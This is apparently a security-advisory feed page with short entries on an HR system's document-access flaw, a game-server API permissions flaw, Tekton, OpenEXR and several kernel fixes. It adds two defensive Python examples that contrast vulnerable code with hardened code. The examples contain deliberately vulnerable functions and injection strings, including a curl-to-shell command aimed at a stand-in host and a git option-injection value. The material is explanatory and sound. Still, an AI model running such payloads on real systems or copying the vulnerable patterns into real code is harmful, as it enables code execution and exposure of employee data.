CVE-2026-40865 Horilla: Insecure Direct Object Reference at `/employee/view-file/<int:id>`
Horilla is a free and open source Human Resource Management System (HRMS). In 1.5.0, an insecure direct object reference in the employee document viewer allows any authenticated user to access other employees’ uploaded documents by changing the document ID in the request. This exposes sensitive HR...
CVE-2026-5652
An insecure direct object reference vulnerability in the Users API component of Crafty Controller allows a remote, authenticated attacker to perform user modification actions via improper API permissions validation...
CVE-2026-25542
The Tekton Pipelines project provides k8s-style resources for declaring CI/CD-style pipelines. Starting in version 0.43.0 and prior to versions 1.0.2, 1.3.4, 1.6.2, 1.9.3, and 1.11.1, trusted resources verification policies match a resource source string refSource.URI against spec.resources.pattern...
CVE-2026-5652
CVE-2026-5652 affects Crafty Controller’s Users API component, enabling an authenticated remote attacker to perform user modification actions due to improper API permissions validation. Reported CVSS 3.1 base score 9.0 (CRITICAL) with network attack vector, low attack complexity, high confidentia...
Remote Code Execution (RCE)
Overview Affected versions of this package are vulnerable to Remote Code Execution (RCE) via insufficient sanitization of user inputs to the reference, path, and branch parameters when handling git resources in GitJobExecutor. An attacker can inject commands, exposing credentials, removing files, or...
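The entry above describes the general failure mode (reference, branch and path values spliced into a git command line without validation) but not the fix. The following is an added example, not the affected project's GitJobExecutor code: it shows the vulnerable string-building shape beside a hardened version that validates the branch against git's own ref naming rules, confines the path to a base directory, restricts the repository URL, and builds an argv list with `--` so no user value can be read as a git option (a value such as `--upload-pack=<program>` would otherwise make git run that program). The URL policy, the base directory and all sample inputs are assumptions constructed for the example.

```python
import re
from pathlib import PurePosixPath

# Added example, not the affected project's code. Git ref naming rules follow
# `git check-ref-format`; the rule that matters most for command injection is
# that a value starting with '-' is parsed by git as an option.
_REF_BAD_SUBSTRINGS = ("..", "@{", "//", "\\")
_REF_BAD_CHARS = frozenset(" ~^:?*[\x7f") | frozenset(chr(c) for c in range(0x20))

# Assumed policy for repository URLs: HTTPS only, host starts with an
# alphanumeric (so it can never look like an option), no userinfo or query.
_REPO_URL_RE = re.compile(r"^https://[A-Za-z0-9][A-Za-z0-9.-]*(:\d+)?(/[A-Za-z0-9._~%-]+)+$")


def is_valid_git_ref(ref: str) -> bool:
    """True if `ref` is a well-formed branch/tag name that cannot be an option."""
    if not ref or len(ref) > 255 or ref == "@":
        return False
    if ref[0] in "-/" or ref.endswith(("/", ".", ".lock")):
        return False
    if any(s in ref for s in _REF_BAD_SUBSTRINGS) or any(c in _REF_BAD_CHARS for c in ref):
        return False
    return not any(p.startswith(".") or p.endswith(".lock") for p in ref.split("/"))


def is_allowed_repo_url(url: str) -> bool:
    """Repository URL allow-list check (assumed policy, see _REPO_URL_RE)."""
    return bool(_REPO_URL_RE.match(url))


def resolve_workdir(base: str, requested: str) -> str:
    """Confine the checkout path to `base`: no absolute paths, no '..'
    components, and nothing that could be read as an option."""
    p = PurePosixPath(requested)
    if not p.parts or p.is_absolute() or ".." in p.parts or requested.startswith("-"):
        raise ValueError("path escapes the job's working directory")
    return str(PurePosixPath(base) / p)


def clone_command_vulnerable(url: str, branch: str, path: str) -> str:
    """The vulnerable shape: parameters concatenated into one string that is
    handed to a shell (e.g. subprocess.run(..., shell=True)). Shell
    metacharacters and a leading '-' both reach git unfiltered."""
    return f"git clone --branch {branch} {url} {path}"


def clone_argv_fixed(base: str, url: str, branch: str, path: str) -> list:
    """The hardened shape: validated inputs, an argv list (no shell), and '--'
    so the URL and path are never parsed as options."""
    if not is_allowed_repo_url(url):
        raise ValueError("repository URL not allowed")
    if not is_valid_git_ref(branch):
        raise ValueError("invalid branch name")
    workdir = resolve_workdir(base, path)
    return ["git", "clone", "--branch", branch, "--", url, workdir]


def build_or_reason(base: str, url: str, branch: str, path: str):
    """Returns the argv list, or the rejection reason as a string."""
    try:
        return clone_argv_fixed(base, url, branch, path)
    except ValueError as exc:
        return str(exc)


if __name__ == "__main__":
    # Constructed inputs in the style of the injection the entry describes.
    repo = "https://git.example.test/org/repo.git"
    print(clone_command_vulnerable(repo, "main; curl evil.example.test | sh", "job1"))
    print(build_or_reason("/srv/jobs", repo, "main; curl evil.example.test | sh", "job1"))
    print(build_or_reason("/srv/jobs", repo, "--upload-pack=touch /tmp/pwned", "job1"))
    print(build_or_reason("/srv/jobs", repo, "release/2026.04", "job1"))
```

The argv list is what `subprocess.run(argv)` (without `shell=True`) should receive; the ref validation is deliberately stricter than git's own so that anything git might accept as an option or as a path-traversing name is rejected before a process is spawned.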
MINI-8274-56H2-P4MP
Bulletin has no description...
AZL-9340 CVE-2022-24801 for package python-twisted is not applicable
This CVE either is no longer applicable or was never applicable...
CVE-2026-40244
OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. In versions 3.4.0 through 3.4.9, 3.3.0 through 3.3.9, and 3.2.0 through 3.2.7, internal_dwa_compressor.h:1722 performs curc->width * curc->height in int32...
CVE-2026-40250
OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. In versions 3.4.0 through 3.4.9, 3.3.0 through 3.3.9, and 3.2.0 through 3.2.7, internal_dwa_compressor.h:1040 performs chan->width * chan->bytes_per_element in...
Malicious Package
Overview ac-sasskit-internal is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this package...
PT-2026-34013
An insecure direct object reference vulnerability in the Users API component of Crafty Controller allows a remote, authenticated attacker to perform user modification actions via improper API permissions validation...
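The Horilla entry (CVE-2026-40865) and the Crafty Controller entries (CVE-2026-5652 / PT-2026-34013) describe the same defect on a read path and on a write path: the application checks that a session exists but never checks that the caller may act on the specific object named by the ID in the request. The following is an added example, not code from either project: a vulnerable document viewer beside its hardened form, and the same object-level check applied to a user-modification API action. The in-memory tables, the `hr_manager` and `admin` role names, and the function names are assumptions constructed for the example.

```python
from dataclasses import dataclass, field

# Added example, not Horilla's or Crafty Controller's code. Tables, roles and
# helper names are assumptions for illustration.


class Forbidden(Exception):
    """Caller has no session, or is authenticated but may not act on this object."""


@dataclass(frozen=True)
class User:
    id: int
    email: str
    roles: frozenset = field(default_factory=frozenset)


@dataclass
class Document:
    id: int
    owner_id: int
    filename: str


# Constructed sample data standing in for the application's database.
USERS = {
    1: User(1, "alice@example.test"),
    2: User(2, "bob@example.test"),
    3: User(3, "hr@example.test", frozenset({"hr_manager"})),
    4: User(4, "root@example.test", frozenset({"admin"})),
}
DOCUMENTS = {
    101: Document(101, owner_id=1, filename="alice_contract.pdf"),
    102: Document(102, owner_id=2, filename="bob_payslip.pdf"),
}


def view_file_vulnerable(user, doc_id):
    """The IDOR: authentication is checked, authorization against the specific
    document is not, so any logged-in user can walk the ID space."""
    if user is None:
        raise Forbidden("login required")
    return DOCUMENTS[doc_id]


def authorized(actor, owner_id, privileged_role):
    """Object-level check: the owner, or a role assumed to need cross-user access."""
    return actor.id == owner_id or privileged_role in actor.roles


def view_file_fixed(user, doc_id):
    """Hardened read path. A missing object and a forbidden one both become
    'not found', so responses do not reveal which IDs exist."""
    if user is None:
        raise Forbidden("login required")
    doc = DOCUMENTS.get(doc_id)
    if doc is None or not authorized(user, doc.owner_id, "hr_manager"):
        raise LookupError("not found")
    return doc


def update_email_fixed(actor, target_id, new_email):
    """Hardened write path for a users API: the object-level check guards the
    modification itself, not merely the presence of a session."""
    if actor is None:
        raise Forbidden("login required")
    target = USERS.get(target_id)
    if target is None or not authorized(actor, target.id, "admin"):
        raise LookupError("not found")
    USERS[target_id] = User(target.id, new_email, target.roles)
    return USERS[target_id]


def access_outcome(fn, *args):
    """Summarise a call as 'ok', 'not_found' or 'forbidden' (for tests/demos)."""
    try:
        fn(*args)
        return "ok"
    except LookupError:
        return "not_found"
    except Forbidden:
        return "forbidden"


if __name__ == "__main__":
    # Alice (id 1) requests Bob's document by changing the ID in the URL.
    print(view_file_vulnerable(USERS[1], 102).filename)          # leaks bob_payslip.pdf
    print(access_outcome(view_file_fixed, USERS[1], 102))         # not_found
    print(access_outcome(view_file_fixed, USERS[3], 102))         # ok (HR role)
    print(access_outcome(update_email_fixed, USERS[1], 2, "x@example.test"))  # not_found
```

Whether a forbidden object is reported as 404 or 403 is a product decision; collapsing both to "not found" is the stricter choice against ID enumeration, and the important property in either case is that the check runs against the object actually loaded, on every read and every write path.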
Unity Linux 20.1060e / 20.1070e Security Update: kernel (UTSA-2026-010834)
The Unity Linux 20 host has a package installed that is affected by a vulnerability as referenced in the UTSA-2026-010834 advisory. In the Linux kernel, the following vulnerability has been resolved: iommu/amd: Fix pci device refcount leak in ppr_notifier() As comment of pci_get_domain_bus_and_slot() says,...
Unity Linux 20.1050e / 20.1070e Security Update: kernel (UTSA-2026-011236)
The Unity Linux 20 host has a package installed that is affected by a vulnerability as referenced in the UTSA-2026-011236 advisory. In the Linux kernel, the following vulnerability has been resolved: Input: imx_sc_key - fix memory corruption on unload This is supposed to be priv but we accidentally...
Unity Linux 20.1060e / 20.1070e Security Update: kernel (UTSA-2026-010780)
The Unity Linux 20 host has a package installed that is affected by a vulnerability as referenced in the UTSA-2026-010780 advisory. In the Linux kernel, the following vulnerability has been resolved: leds: led-core: Fix refcount leak in of_led_get() class_find_device_by_of_node() calls class_find_device(), it...
Unity Linux 20.1050e / 20.1070e Security Update: kernel (UTSA-2026-010863)
The Unity Linux 20 host has a package installed that is affected by a vulnerability as referenced in the UTSA-2026-010863 advisory. In the Linux kernel, the following vulnerability has been resolved: ASoC: fsl_mqs: move of_node_put() to the correct location of_node_put() should have been done directly...
Unity Linux 20.1050e / 20.1070e Security Update: kernel (UTSA-2026-011224)
The Unity Linux 20 host has a package installed that is affected by a vulnerability as referenced in the UTSA-2026-011224 advisory. In the Linux kernel, the following vulnerability has been resolved: fbdev/ep93xx-fb: Do not assign to struct fb_info.dev Do not assign the Linux device to struct...
Unity Linux 20.1050e / 20.1060e / 20.1070e Security Update: kernel (UTSA-2026-010707)
The Unity Linux 20 host has a package installed that is affected by a vulnerability as referenced in the UTSA-2026-010707 advisory. In the Linux kernel, the following vulnerability has been resolved: mm/damon/dbgfs: fix 'struct pid' leaks in 'dbgfs_target_ids_write()' DAMON debugfs interface increases...
Unity Linux 20.1060e / 20.1070e Security Update: kernel (UTSA-2026-011034)
The Unity Linux 20 host has a package installed that is affected by a vulnerability as referenced in the UTSA-2026-011034 advisory. In the Linux kernel, the following vulnerability has been resolved: hwrng: amd - Fix PCI device refcount leak for_each_pci_dev() is implemented by pci_get_device(). The comme...
Unity Linux 20.1060a / 20.1070a Security Update: kernel (UTSA-2026-006916)
The Unity Linux 20 host has a package installed that is affected by a vulnerability as referenced in the UTSA-2026-006916 advisory. In the Linux kernel, the following vulnerability has been resolved: sctp: add a refcnt in sctp_stream_priorities to avoid a nested loop With this refcnt added in...